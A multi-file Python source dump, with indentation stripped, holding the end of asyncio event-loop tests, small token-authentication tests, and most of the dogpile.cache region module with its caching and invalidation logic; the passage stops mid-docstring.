if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
test_platform.py
|
from unittest.mock import Mock, patch
from threading import Thread
from . import MockPlatform
AUTHENTICATION_COUNT = 10
def test_whenTokenIsSetAndNotExpired_thenIsAuthenticated():
platform = MockPlatform()
platform._authenticate()
assert platform._is_authenticated()
def test_whenTokenIsNotSet_thenIsNotAuthenticated():
platform = MockPlatform()
platform._authenticate()
platform.access_token = None
assert not platform._is_authenticated()
def test_whenTokenIsExpired_thenIsNotAuthenticated():
platform = MockPlatform()
platform._authenticate()
platform.expires_at = 0
assert not platform._is_authenticated()
def test_whenAuthenticatingManyTimesSimultaneously_thenIsAuthenticatedOnce():
platform = MockPlatform()
access_token_setter = Mock(wraps=MockPlatform.access_token.fset)
mock = MockPlatform.access_token.setter(access_token_setter)
with patch.object(MockPlatform, 'access_token', mock):
def task(p):
p._authenticate()
threads = []
for _ in range(AUTHENTICATION_COUNT):
t = Thread(target=task, args=[platform], group=None)
t.start()
threads.append(t)
for thread in threads:
thread.join()
access_token_setter.assert_called_once()
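# The MockPlatform used above is imported from the package under test and is not
# shown here. Purely as an illustrative, hypothetical sketch (names and details
# are assumptions, not the project's actual implementation), a platform that
# satisfies these tests would track a token plus expiry and guard _authenticate
# with a lock so concurrent callers only fetch one token:
#
#     import time, threading
#
#     class SketchPlatform:
#         def __init__(self):
#             self._lock = threading.Lock()
#             self.access_token = None
#             self.expires_at = 0
#
#         def _is_authenticated(self):
#             return self.access_token is not None and time.time() < self.expires_at
#
#         def _authenticate(self):
#             with self._lock:
#                 if self._is_authenticated():
#                     return                      # another thread already got a token
#                 self.access_token = "token"     # placeholder for a real token request
#                 self.expires_at = time.time() + 3600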
|
region.py
|
from __future__ import with_statement
from .. import Lock, NeedRegenerationException
from ..util import NameRegistry
from . import exception
from ..util import PluginLoader, memoized_property, coerce_string_conf
from .util import function_key_generator, function_multi_key_generator
from .api import NO_VALUE, CachedValue
from .proxy import ProxyBackend
from ..util import compat
import time
import datetime
from numbers import Number
from functools import wraps
import threading
_backend_loader = PluginLoader("dogpile.cache")
register_backend = _backend_loader.register
from . import backends # noqa
value_version = 1
"""An integer placed in the :class:`.CachedValue`
so that new versions of dogpile.cache can detect cached
values from a previous, backwards-incompatible version.
"""
class RegionInvalidationStrategy(object):
"""Region invalidation strategy interface
Implement this interface and pass implementation instance
to :meth:`.CacheRegion.configure` to override default region invalidation.
Example::
class CustomInvalidationStrategy(RegionInvalidationStrategy):
def __init__(self):
self._soft_invalidated = None
self._hard_invalidated = None
def invalidate(self, hard=None):
if hard:
self._soft_invalidated = None
self._hard_invalidated = time.time()
else:
self._soft_invalidated = time.time()
self._hard_invalidated = None
def is_invalidated(self, timestamp):
return ((self._soft_invalidated and
timestamp < self._soft_invalidated) or
(self._hard_invalidated and
timestamp < self._hard_invalidated))
def was_hard_invalidated(self):
return bool(self._hard_invalidated)
def is_hard_invalidated(self, timestamp):
return (self._hard_invalidated and
timestamp < self._hard_invalidated)
def was_soft_invalidated(self):
return bool(self._soft_invalidated)
def is_soft_invalidated(self, timestamp):
return (self._soft_invalidated and
timestamp < self._soft_invalidated)
The custom implementation is injected into a :class:`.CacheRegion`
at configure time using the
:paramref:`.CacheRegion.configure.region_invalidator` parameter::
region = CacheRegion()
region = region.configure(region_invalidator=CustomInvalidationStrategy())
Invalidation strategies that wish to have access to the
:class:`.CacheRegion` itself should construct the invalidator given the
region as an argument::
class MyInvalidator(RegionInvalidationStrategy):
def __init__(self, region):
self.region = region
# ...
# ...
region = CacheRegion()
region = region.configure(region_invalidator=MyInvalidator(region))
.. versionadded:: 0.6.2
.. seealso::
:paramref:`.CacheRegion.configure.region_invalidator`
"""
def invalidate(self, hard=True):
"""Region invalidation.
:class:`.CacheRegion` propagated call.
The default invalidation system works by setting
a current timestamp (using ``time.time()``) to consider all older
timestamps effectively invalidated.
"""
raise NotImplementedError()
def is_hard_invalidated(self, timestamp):
"""Check timestamp to determine if it was hard invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time and region is invalidated
in hard mode.
"""
raise NotImplementedError()
def is_soft_invalidated(self, timestamp):
"""Check timestamp to determine if it was soft invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time and region is invalidated
in soft mode.
"""
raise NotImplementedError()
def is_invalidated(self, timestamp):
"""Check timestamp to determine if it was invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time.
"""
raise NotImplementedError()
def was_soft_invalidated(self):
"""Indicate the region was invalidated in soft mode.
:return: Boolean. True if region was invalidated in soft mode.
"""
raise NotImplementedError()
def was_hard_invalidated(self):
"""Indicate the region was invalidated in hard mode.
:return: Boolean. True if region was invalidated in hard mode.
"""
raise NotImplementedError()
class DefaultInvalidationStrategy(RegionInvalidationStrategy):
def __init__(self):
self._is_hard_invalidated = None
self._invalidated = None
def invalidate(self, hard=True):
self._is_hard_invalidated = bool(hard)
self._invalidated = time.time()
def is_invalidated(self, timestamp):
return (self._invalidated is not None and
timestamp < self._invalidated)
def was_hard_invalidated(self):
return self._is_hard_invalidated is True
def is_hard_invalidated(self, timestamp):
return self.was_hard_invalidated() and self.is_invalidated(timestamp)
def was_soft_invalidated(self):
return self._is_hard_invalidated is False
def is_soft_invalidated(self, timestamp):
return self.was_soft_invalidated() and self.is_invalidated(timestamp)
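# A small usage sketch of the default strategy above (illustrative only): hard
# invalidation marks older timestamps as both invalidated and hard-invalidated,
# while soft invalidation leaves is_hard_invalidated() False so stale values can
# still be served while regeneration happens.
#
#     strategy = DefaultInvalidationStrategy()
#     earlier = time.time() - 1
#     strategy.invalidate(hard=False)
#     assert strategy.is_invalidated(earlier)
#     assert strategy.is_soft_invalidated(earlier)
#     assert not strategy.is_hard_invalidated(earlier)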
class CacheRegion(object):
"""A front end to a particular cache backend.
:param name: Optional, a string name for the region.
This isn't used internally
but can be accessed via the ``.name`` parameter, helpful
for configuring a region from a config file.
:param function_key_generator: Optional. A
function that will produce a "cache key" given
a data creation function and arguments, when using
the :meth:`.CacheRegion.cache_on_arguments` method.
The structure of this function
should be two levels: given the data creation function,
return a new function that generates the key based on
the given arguments. Such as::
def my_key_generator(namespace, fn, **kw):
fname = fn.__name__
def generate_key(*arg):
return namespace + "_" + fname + "_".join(str(s) for s in arg)
return generate_key
region = make_region(
function_key_generator = my_key_generator
).configure(
"dogpile.cache.dbm",
expiration_time=300,
arguments={
"filename":"file.dbm"
}
)
The ``namespace`` is that passed to
:meth:`.CacheRegion.cache_on_arguments`. It's not consulted
outside this function, so in fact can be of any form.
For example, it can be passed as a tuple, used to specify
arguments to pluck from \**kw::
def my_key_generator(namespace, fn):
def generate_key(*arg, **kw):
return ":".join(
[kw[k] for k in namespace] +
[str(x) for x in arg]
)
return generate_key
Where the decorator might be used as::
@my_region.cache_on_arguments(namespace=('x', 'y'))
def my_function(a, b, **kw):
return my_data()
.. seealso::
:func:`.function_key_generator` - default key generator
:func:`.kwarg_function_key_generator` - optional gen that also
uses keyword arguments
:param function_multi_key_generator: Optional.
Similar to ``function_key_generator`` parameter, but it's used in
:meth:`.CacheRegion.cache_multi_on_arguments`. Generated function
should return list of keys. For example::
def my_multi_key_generator(namespace, fn, **kw):
namespace = fn.__name__ + (namespace or '')
def generate_keys(*args):
return [namespace + ':' + str(a) for a in args]
return generate_keys
:param key_mangler: Function which will be used on all incoming
keys before passing to the backend. Defaults to ``None``,
in which case the key mangling function recommended by
the cache backend will be used. A typical mangler
is the SHA1 mangler found at :func:`.sha1_mangle_key`
which coerces keys into a SHA1
hash, so that the string length is fixed. To
disable all key mangling, set to ``False``. Another typical
mangler is the built-in Python function ``str``, which can be used
to convert non-string or Unicode keys to bytestrings, which is
needed when using a backend such as bsddb or dbm under Python 2.x
in conjunction with Unicode keys.
:param async_creation_runner: A callable that, when specified,
will be passed to and called by dogpile.lock when
there is a stale value present in the cache. It will be passed the
mutex and is responsible for releasing that mutex when finished.
This can be used to defer the computation of expensive creator
functions to later points in the future by way of, for example, a
background thread, a long-running queue, or a task manager system
like Celery.
For a specific example using async_creation_runner, new values can
be created in a background thread like so::
import threading
def async_creation_runner(cache, somekey, creator, mutex):
''' Used by dogpile.core:Lock when appropriate '''
def runner():
try:
value = creator()
cache.set(somekey, value)
finally:
mutex.release()
thread = threading.Thread(target=runner)
thread.start()
region = make_region(
async_creation_runner=async_creation_runner,
).configure(
'dogpile.cache.memcached',
expiration_time=5,
arguments={
'url': '127.0.0.1:11211',
'distributed_lock': True,
}
)
Remember that the first request for a key with no associated
value will always block; async_creator will not be invoked.
However, subsequent requests for cached-but-expired values will
still return promptly. They will be refreshed by whatever
asynchronous means the provided async_creation_runner callable
implements.
By default the async_creation_runner is disabled and is set
to ``None``.
.. versionadded:: 0.4.2 added the async_creation_runner
feature.
"""
def __init__(
self,
name=None,
function_key_generator=function_key_generator,
function_multi_key_generator=function_multi_key_generator,
key_mangler=None,
async_creation_runner=None,
):
"""Construct a new :class:`.CacheRegion`."""
self.name = name
self.function_key_generator = function_key_generator
self.function_multi_key_generator = function_multi_key_generator
self.key_mangler = self._user_defined_key_mangler = key_mangler
self.async_creation_runner = async_creation_runner
self.region_invalidator = DefaultInvalidationStrategy()
def configure(
self, backend,
expiration_time=None,
arguments=None,
_config_argument_dict=None,
_config_prefix=None,
wrap=None,
replace_existing_backend=False,
region_invalidator=None
):
"""Configure a :class:`.CacheRegion`.
The :class:`.CacheRegion` itself
is returned.
:param backend: Required. This is the name of the
:class:`.CacheBackend` to use, and is resolved by loading
the class from the ``dogpile.cache`` entrypoint.
:param expiration_time: Optional. The expiration time passed
to the dogpile system. May be passed as an integer number
of seconds, or as a ``datetime.timedelta`` value.
.. versionadded:: 0.5.0
``expiration_time`` may be optionally passed as a
``datetime.timedelta`` value.
The :meth:`.CacheRegion.get_or_create`
method as well as the :meth:`.CacheRegion.cache_on_arguments`
decorator (though note: **not** the :meth:`.CacheRegion.get`
method) will call upon the value creation function after this
time period has passed since the last generation.
:param arguments: Optional. The structure here is passed
directly to the constructor of the :class:`.CacheBackend`
in use, though is typically a dictionary.
:param wrap: Optional. A list of :class:`.ProxyBackend`
classes and/or instances, each of which will be applied
in a chain to ultimately wrap the original backend,
so that custom functionality augmentation can be applied.
.. versionadded:: 0.5.0
.. seealso::
:ref:`changing_backend_behavior`
:param replace_existing_backend: if True, the existing cache backend
will be replaced. Without this flag, an exception is raised if
a backend is already configured.
.. versionadded:: 0.5.7
:param region_invalidator: Optional. Override default invalidation
strategy with custom implementation of
:class:`.RegionInvalidationStrategy`.
.. versionadded:: 0.6.2
"""
if "backend" in self.__dict__ and not replace_existing_backend:
raise exception.RegionAlreadyConfigured(
"This region is already "
"configured with backend: %s. "
"Specify replace_existing_backend=True to replace."
% self.backend)
try:
backend_cls = _backend_loader.load(backend)
except PluginLoader.NotFound:
raise exception.PluginNotFound(
"Couldn't find cache plugin to load: %s" % backend)
if _config_argument_dict:
self.backend = backend_cls.from_config_dict(
_config_argument_dict,
_config_prefix
)
else:
self.backend = backend_cls(arguments or {})
if not expiration_time or isinstance(expiration_time, Number):
self.expiration_time = expiration_time
elif isinstance(expiration_time, datetime.timedelta):
self.expiration_time = int(
compat.timedelta_total_seconds(expiration_time))
else:
raise exception.ValidationError(
'expiration_time is not a number or timedelta.')
if not self._user_defined_key_mangler:
self.key_mangler = self.backend.key_mangler
self._lock_registry = NameRegistry(self._create_mutex)
if getattr(wrap, '__iter__', False):
for wrapper in reversed(wrap):
self.wrap(wrapper)
if region_invalidator:
self.region_invalidator = region_invalidator
return self
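# Typical configuration flow for the method above (a minimal sketch; the
# 'dogpile.cache.memory' backend name is the stock in-memory backend shipped
# with dogpile.cache):
#
#     region = CacheRegion()
#     region.configure(
#         'dogpile.cache.memory',
#         expiration_time=datetime.timedelta(minutes=5),   # or a plain number of seconds
#     )
#     assert region.is_configured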
def wrap(self, proxy):
''' Takes a ProxyBackend instance or class and wraps the
attached backend. '''
# if we were passed a type rather than an instance then
# initialize it.
if type(proxy) == type:
proxy = proxy()
if not issubclass(type(proxy), ProxyBackend):
raise TypeError("Type %s is not a valid ProxyBackend"
% type(proxy))
self.backend = proxy.wrap(self.backend)
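# Sketch of how wrap() above is typically used (illustrative; it assumes only the
# documented ProxyBackend interface, where self.proxied is the wrapped backend):
#
#     class LoggingProxy(ProxyBackend):
#         def set(self, key, value):
#             print("caching %r" % (key,))
#             return self.proxied.set(key, value)
#
#     region.wrap(LoggingProxy)    # a class or an instance is accepted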
def _mutex(self, key):
return self._lock_registry.get(key)
class _LockWrapper(object):
"""weakref-capable wrapper for threading.Lock"""
def __init__(self):
self.lock = threading.Lock()
def acquire(self, wait=True):
return self.lock.acquire(wait)
def release(self):
self.lock.release()
def _create_mutex(self, key):
mutex = self.backend.get_mutex(key)
if mutex is not None:
return mutex
else:
return self._LockWrapper()
# cached value
_actual_backend = None
@property
def actual_backend(self):
"""Return the ultimate backend underneath any proxies.
The backend might be the result of one or more ``proxy.wrap``
applications. If so, derive the actual underlying backend.
.. versionadded:: 0.6.6
"""
if self._actual_backend is None:
_backend = self.backend
while hasattr(_backend, 'proxied'):
_backend = _backend.proxied
self._actual_backend = _backend
return self._actual_backend
def invalidate(self, hard=True):
"""Invalidate this :class:`.CacheRegion`.
The default invalidation system works by setting
a current timestamp (using ``time.time()``)
representing the "minimum creation time" for
a value. Any retrieved value whose creation
time is prior to this timestamp
is considered to be stale. It does not
affect the data in the cache in any way, and is
**local to this instance of :class:`.CacheRegion`.**
.. warning::
The :meth:`.CacheRegion.invalidate` method's default mode of
operation is to set a timestamp **local to this CacheRegion
in this Python process only**. It does not impact other Python
processes or regions as the timestamp is **only stored locally in
memory**. To implement invalidation where the
timestamp is stored in the cache or similar so that all Python
processes can be affected by an invalidation timestamp, implement a
custom :class:`.RegionInvalidationStrategy`.
Once set, the invalidation time is honored by
the :meth:`.CacheRegion.get_or_create`,
:meth:`.CacheRegion.get_or_create_multi` and
:meth:`.CacheRegion.get` methods.
The method supports both "hard" and "soft" invalidation
options. With "hard" invalidation,
:meth:`.CacheRegion.get_or_create` will force an immediate
regeneration of the value which all getters will wait for.
With "soft" invalidation, subsequent getters will return the
"old" value until the new one is available.
Usage of "soft" invalidation requires that the region or the method
is given a non-None expiration time.
.. versionadded:: 0.3.0
:param hard: if True, cache values will all require immediate
regeneration; dogpile logic won't be used. If False, the
creation time of existing values will be pushed back before
the expiration time so that a return+regen will be invoked.
.. versionadded:: 0.5.1
"""
self.region_invalidator.invalidate(hard)
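# Usage sketch for invalidate() above (illustrative): note that soft invalidation
# only makes sense when an expiration time is configured, as documented.
#
#     region.invalidate()            # hard: next get_or_create() blocks and regenerates
#     region.invalidate(hard=False)  # soft: stale value served while one caller regenerates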
def configure_from_config(self, config_dict, prefix):
"""Configure from a configuration dictionary
and a prefix.
Example::
local_region = make_region()
memcached_region = make_region()
# regions are ready to use for function
# decorators, but not yet for actual caching
# later, when config is available
myconfig = {
"cache.local.backend":"dogpile.cache.dbm",
"cache.local.arguments.filename":"/path/to/dbmfile.dbm",
"cache.memcached.backend":"dogpile.cache.pylibmc",
"cache.memcached.arguments.url":"127.0.0.1, 10.0.0.1",
}
local_region.configure_from_config(myconfig, "cache.local.")
memcached_region.configure_from_config(myconfig,
"cache.memcached.")
"""
config_dict = coerce_string_conf(config_dict)
return self.configure(
config_dict["%sbackend" % prefix],
expiration_time=config_dict.get(
"%sexpiration_time" % prefix, None),
_config_argument_dict=config_dict,
_config_prefix="%sarguments." % prefix,
wrap=config_dict.get(
"%swrap" % prefix, None),
replace_existing_backend=config_dict.get(
"%sreplace_existing_backend" % prefix, False),
)
@memoized_property
def backend(self):
raise exception.RegionNotConfigured(
"No backend is configured on this region.")
@property
def is_configured(self):
"""Return True if the backend has been configured via the
:meth:`.CacheRegion.configure` method already.
.. versionadded:: 0.5.1
"""
return 'backend' in self.__dict__
def get(self, key, expiration_time=None, ignore_expiration=False):
"""Return a value from the cache, based on the given key.
If the value is not present, the method returns the token
``NO_VALUE``. ``NO_VALUE`` evaluates to False, but is distinct from
``None``, so that a cached value of ``None`` can be told apart from a miss.
By default, the configured expiration time of the
:class:`.CacheRegion`, or alternatively the expiration
time supplied by the ``expiration_time`` argument,
is tested against the creation time of the retrieved
value versus the current time (as reported by ``time.time()``).
If stale, the cached value is ignored and the ``NO_VALUE``
token is returned. Passing the flag ``ignore_expiration=True``
bypasses the expiration time check.
.. versionchanged:: 0.3.0
:meth:`.CacheRegion.get` now checks the value's creation time
against the expiration time, rather than returning
the value unconditionally.
The method also interprets the cached value in terms
of the current "invalidation" time as set by
the :meth:`.invalidate` method. If a value is present,
but its creation time is older than the current
invalidation time, the ``NO_VALUE`` token is returned.
Passing the flag ``ignore_expiration=True`` bypasses
the invalidation time check.
.. versionadded:: 0.3.0
Support for the :meth:`.CacheRegion.invalidate`
method.
:param key: Key to be retrieved. While it's typical for a key to be a
string, it is ultimately passed directly down to the cache backend,
before being optionally processed by the key_mangler function, so can
be of any type recognized by the backend or by the key_mangler
function, if present.
:param expiration_time: Optional expiration time value
which will supersede that configured on the :class:`.CacheRegion`
itself.
.. versionadded:: 0.3.0
:param ignore_expiration: if ``True``, the value is returned
from the cache if present, regardless of configured
expiration times or whether or not :meth:`.invalidate`
was called.
.. versionadded:: 0.3.0
"""
if self.key_mangler:
key = self.key_mangler(key)
value = self.backend.get(key)
value = self._unexpired_value_fn(
expiration_time, ignore_expiration)(value)
return value.payload
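# Usage sketch for get() above (illustrative): NO_VALUE is falsey but distinct
# from a cached None, so compare with "is" when the distinction matters.
# load_user() is a hypothetical loader, not part of this module.
#
#     value = region.get("user:42")
#     if value is NO_VALUE:
#         value = load_user(42)
#         region.set("user:42", value)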
def _unexpired_value_fn(self, expiration_time, ignore_expiration):
if ignore_expiration:
return lambda value: value
else:
if expiration_time is None:
expiration_time = self.expiration_time
current_time = time.time()
def value_fn(value):
if value is NO_VALUE:
return value
elif expiration_time is not None and \
current_time - value.metadata["ct"] > expiration_time:
return NO_VALUE
elif self.region_invalidator.is_invalidated(
value.metadata["ct"]):
return NO_VALUE
else:
return value
return value_fn
def get_multi(self, keys, expiration_time=None, ignore_expiration=False):
"""Return multiple values from the cache, based on the given keys.
Returns values as a list matching the keys given.
E.g.::
values = region.get_multi(["one", "two", "three"])
To convert values to a dictionary, use ``zip()``::
keys = ["one", "two", "three"]
values = region.get_multi(keys)
dictionary = dict(zip(keys, values))
Keys which aren't present in the cache are returned as
the ``NO_VALUE`` token. ``NO_VALUE`` evaluates to False,
but is distinct from ``None``, so that a cached value of
``None`` can be told apart from a missing key.
By default, the configured expiration time of the
:class:`.CacheRegion`, or alternatively the expiration
time supplied by the ``expiration_time`` argument,
is tested against the creation time of the retrieved
value versus the current time (as reported by ``time.time()``).
If stale, the cached value is ignored and the ``NO_VALUE``
token is returned. Passing the flag ``ignore_expiration=True``
bypasses the expiration time check.
.. versionadded:: 0.5.0
"""
if not keys:
return []
if self.key_mangler:
keys = list(map(lambda key: self.key_mangler(key), keys))
backend_values = self.backend.get_multi(keys)
_unexpired_value_fn = self._unexpired_value_fn(
expiration_time, ignore_expiration)
return [
value.payload if value is not NO_VALUE else value
for value in
(
_unexpired_value_fn(value) for value in
backend_values
)
]
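# Usage sketch for get_multi() above (illustrative), combining the zip() recipe
# from the docstring with a check for missing entries:
#
#     keys = ["one", "two", "three"]
#     found = dict(zip(keys, region.get_multi(keys)))
#     missing = [k for k, v in found.items() if v is NO_VALUE]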
def get_or_create(
self, key, creator, expiration_time=None, should_cache_fn=None):
"""Return a cached value based on the given key.
If the value does not exist or is considered to be expired
based on its creation time, the given
creation function may or may not be used to recreate the value
and persist the newly generated value in the cache.
Whether or not the function is used depends on if the
*dogpile lock* can be acquired or not. If it can't, it means
a different thread or process is already running a creation
function for this key against the cache. When the dogpile
lock cannot be acquired, the method will block if no
previous value is available, until the lock is released and
a new value is available. If a previous value
is available, that value is returned immediately without blocking.
If the :meth:`.invalidate` method has been called, and
the retrieved value's timestamp is older than the invalidation
timestamp, the value is unconditionally prevented from
being returned. The method will attempt to acquire the dogpile
lock to generate a new value, or will wait
until the lock is released to return the new value.
.. versionchanged:: 0.3.0
The value is unconditionally regenerated if the creation
time is older than the last call to :meth:`.invalidate`.
:param key: Key to be retrieved. While it's typical for a key to be a
string, it is ultimately passed directly down to the cache backend,
before being optionally processed by the key_mangler function, so can
be of any type recognized by the backend or by the key_mangler
function, if present.
:param creator: function which creates a new value.
        :param expiration_time: optional expiration time which will override
the expiration time already configured on this :class:`.CacheRegion`
if not None. To set no expiration, use the value -1.
:param should_cache_fn: optional callable function which will receive
the value returned by the "creator", and will then return True or
False, indicating if the value should actually be cached or not. If
it returns False, the value is still returned, but isn't cached.
E.g.::
def dont_cache_none(value):
return value is not None
value = region.get_or_create("some key",
create_value,
should_cache_fn=dont_cache_none)
Above, the function returns the value of create_value() if
the cache is invalid, however if the return value is None,
it won't be cached.
.. versionadded:: 0.4.3
.. seealso::
:meth:`.CacheRegion.cache_on_arguments` - applies
:meth:`.get_or_create` to any function using a decorator.
:meth:`.CacheRegion.get_or_create_multi` - multiple key/value
version
"""
orig_key = key
if self.key_mangler:
key = self.key_mangler(key)
def get_value():
value = self.backend.get(key)
if (value is NO_VALUE or value.metadata['v'] != value_version or
self.region_invalidator.is_hard_invalidated(
value.metadata["ct"])):
raise NeedRegenerationException()
ct = value.metadata["ct"]
if self.region_invalidator.is_soft_invalidated(ct):
ct = time.time() - expiration_time - .0001
return value.payload, ct
def gen_value():
created_value = creator()
value = self._value(created_value)
if not should_cache_fn or \
should_cache_fn(created_value):
self.backend.set(key, value)
return value.payload, value.metadata["ct"]
if expiration_time is None:
expiration_time = self.expiration_time
if (expiration_time is None and
self.region_invalidator.was_soft_invalidated()):
raise exception.DogpileCacheException(
"Non-None expiration time required "
"for soft invalidation")
if expiration_time == -1:
expiration_time = None
if self.async_creation_runner:
def async_creator(mutex):
return self.async_creation_runner(
self, orig_key, creator, mutex)
else:
async_creator = None
with Lock(
self._mutex(key),
gen_value,
get_value,
expiration_time,
async_creator) as value:
return value
def get_or_create_multi(
self, keys, creator, expiration_time=None, should_cache_fn=None):
"""Return a sequence of cached values based on a sequence of keys.
The behavior for generation of values based on keys corresponds
to that of :meth:`.Region.get_or_create`, with the exception that
the ``creator()`` function may be asked to generate any subset of
the given keys. The list of keys to be generated is passed to
``creator()``, and ``creator()`` should return the generated values
as a sequence corresponding to the order of the keys.
The method uses the same approach as :meth:`.Region.get_multi`
and :meth:`.Region.set_multi` to get and set values from the
backend.
If you are using a :class:`.CacheBackend` or :class:`.ProxyBackend`
that modifies values, take note this function invokes
``.set_multi()`` for newly generated values using the same values it
returns to the calling function. A correct implementation of
``.set_multi()`` will not modify values in-place on the submitted
``mapping`` dict.
:param keys: Sequence of keys to be retrieved.
:param creator: function which accepts a sequence of keys and
returns a sequence of new values.
        :param expiration_time: optional expiration time which will override
the expiration time already configured on this :class:`.CacheRegion`
if not None. To set no expiration, use the value -1.
:param should_cache_fn: optional callable function which will receive
each value returned by the "creator", and will then return True or
False, indicating if the value should actually be cached or not. If
it returns False, the value is still returned, but isn't cached.
.. versionadded:: 0.5.0
.. seealso::
:meth:`.CacheRegion.cache_multi_on_arguments`
:meth:`.CacheRegion.get_or_create`
"""
def get_value(key):
value = values.get(key, NO_VALUE)
if (value is NO_VALUE or value.metadata['v'] != value_version or
self.region_invalidator.is_hard_invalidated(
value.metadata['ct'])):
# dogpile.core understands a 0 here as
# "the value is not available", e.g.
# _has_value() will return False.
return value.payload, 0
else:
ct = value.metadata["ct"]
if self.region_invalidator.is_soft_invalidated(ct):
ct = time.time() - expiration_time - .0001
return value.payload, ct
def gen_value():
raise NotImplementedError()
def async_creator(key, mutex):
mutexes[key] = mutex
if expiration_time is None:
expiration_time = self.expiration_time
if (expiration_time is None and
self.region_invalidator.was_soft_invalidated()):
raise exception.DogpileCacheException(
"Non-None expiration time required "
"for soft invalidation")
if expiration_time == -1:
expiration_time = None
mutexes = {}
sorted_unique_keys = sorted(set(keys))
if self.key_mangler:
mangled_keys = [self.key_mangler(k) for k in sorted_unique_keys]
else:
mangled_keys = sorted_unique_keys
orig_to_mangled = dict(zip(sorted_unique_keys, mangled_keys))
values = dict(zip(mangled_keys, self.backend.get_multi(mangled_keys)))
for orig_key, mangled_key in orig_to_mangled.items():
with Lock(
self._mutex(mangled_key),
gen_value,
lambda: get_value(mangled_key),
expiration_time,
async_creator=lambda mutex: async_creator(orig_key, mutex)
):
pass
try:
if mutexes:
# sort the keys, the idea is to prevent deadlocks.
# though haven't been able to simulate one anyway.
keys_to_get = sorted(mutexes)
new_values = creator(*keys_to_get)
values_w_created = dict(
(orig_to_mangled[k], self._value(v))
for k, v in zip(keys_to_get, new_values)
)
if not should_cache_fn:
self.backend.set_multi(values_w_created)
else:
values_to_cache = dict(
(k, v)
for k, v in values_w_created.items()
if should_cache_fn(v[0])
)
if values_to_cache:
self.backend.set_multi(values_to_cache)
values.update(values_w_created)
return [values[orig_to_mangled[k]].payload for k in keys]
finally:
for mutex in mutexes.values():
mutex.release()
def _value(self, value):
"""Return a :class:`.CachedValue` given a value."""
return CachedValue(
value,
{
"ct": time.time(),
"v": value_version
})
def set(self, key, value):
"""Place a new value in the cache under the given key."""
if self.key_mangler:
key = self.key_mangler(key)
self.backend.set(key, self._value(value))
def set_multi(self, mapping):
"""Place new values in the cache under the given keys.
.. versionadded:: 0.5.0
"""
if not mapping:
return
if self.key_mangler:
mapping = dict((
self.key_mangler(k), self._value(v))
for k, v in mapping.items())
else:
mapping = dict((k, self._value(v)) for k, v in mapping.items())
self.backend.set_multi(mapping)
def delete(self, key):
"""Remove a value from the cache.
This operation is idempotent (can be called multiple times, or on a
non-existent key, safely)
"""
if self.key_mangler:
key = self.key_mangler(key)
self.backend.delete(key)
def delete_multi(self, keys):
"""Remove multiple values from the cache.
This operation is idempotent (can be called multiple times, or on a
non-existent key, safely)
.. versionadded:: 0.5.0
"""
if self.key_mangler:
keys = list(map(lambda key: self.key_mangler(key), keys))
self.backend.delete_multi(keys)
def cache_on_arguments(
self, namespace=None,
expiration_time=None,
should_cache_fn=None,
to_str=compat.string_type,
function_key_generator=None):
"""A function decorator that will cache the return
value of the function using a key derived from the
function itself and its arguments.
The decorator internally makes use of the
:meth:`.CacheRegion.get_or_create` method to access the
cache and conditionally call the function. See that
method for additional behavioral details.
E.g.::
@someregion.cache_on_arguments()
def generate_something(x, y):
return somedatabase.query(x, y)
The decorated function can then be called normally, where
data will be pulled from the cache region unless a new
value is needed::
result = generate_something(5, 6)
The function is also given an attribute ``invalidate()``, which
provides for invalidation of the value. Pass to ``invalidate()``
the same arguments you'd pass to the function itself to represent
a particular value::
generate_something.invalidate(5, 6)
Another attribute ``set()`` is added to provide extra caching
possibilities relative to the function. This is a convenience
method for :meth:`.CacheRegion.set` which will store a given
value directly without calling the decorated function.
The value to be cached is passed as the first argument, and the
arguments which would normally be passed to the function
